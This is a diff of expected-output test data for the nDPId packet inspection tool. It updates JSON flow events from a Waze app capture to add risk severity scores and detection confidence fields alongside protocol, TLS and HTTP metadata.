-00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587869162,"flow_last_seen":1435587869166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1435587869166,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+01087{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
+01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
+01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
+00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871656,"flow_last_seen":1435587871656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587871656,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1435587871656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587871656,"pkt":"ABoRAAACABoRAAABCABFAAA8\/jRAAEAGF+wKCAABNubjrLHiAFBcJZMGAAAAAKAC\/\/8UywAAAgQFtAQCCAoACG0yAAAAAAEDAwg="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1435587871657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAodJ1AABAG0Zc25uOsCggAAQBQseKj2mz5XCWTB1AS\/\/\/ZAwAA"}
@@ -50,8 +52,10 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1435587871658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587871658,"pkt":"ABoRAAACABoRAAABCABFAAA8NxhAAEAG3wgKCAABNubjrLHkAFDBi1oqAAAAAKAC\/\/\/oPgAAAgQFtAQCCAoACG0yAAAAAAEDAwg="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1435587871659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587871659,"pkt":"ABoRAAACABoRAAABCABFAAAodJ5AABAG0ZY25uOsCggAAQBQseQ+dKXVwYtaK1AS\/\/\/ZAQAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1435587871660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587871660,"pkt":"ABoRAAACABoRAAABCABFAAAoNxlAAEAG3xsKCAABNubjrLHkAFDBi1orPnSl1lAQ\/\/\/ZAgAA"}
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":108,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871656,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871918,"flow_last_seen":1435587871918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587871918,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1435587871918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587871918,"pkt":"ABoRAAACABoRAAABCABFAAA8cIlAAEAGqJ4KCAABsCJnacdpAbv69x3BAAAAAKAC\/\/\/XPAAAAgQFtAQCCAoACG1IAAAAAAEDAwg="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1435587871929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAAodKhAABAG1JOwImdpCggAAQG7x2kFCOI++vcdwlAS\/\/\/FGAAA"}
@@ -72,55 +76,58 @@
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAo\/W1AAEAGG84KCAABsCJnacdrAbsTBZAl7Ppv3FAQ\/\/\/FFwAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoxDVAAEAGxaUKCAABNBFy25hiAbudWal9YqZWhFAQ\/\/9kwAAA"}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoRGhAAEAG0cwKCAABNubjrLHqAFALhykw9HjW0VAQ\/\/\/Y\/AAA"}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
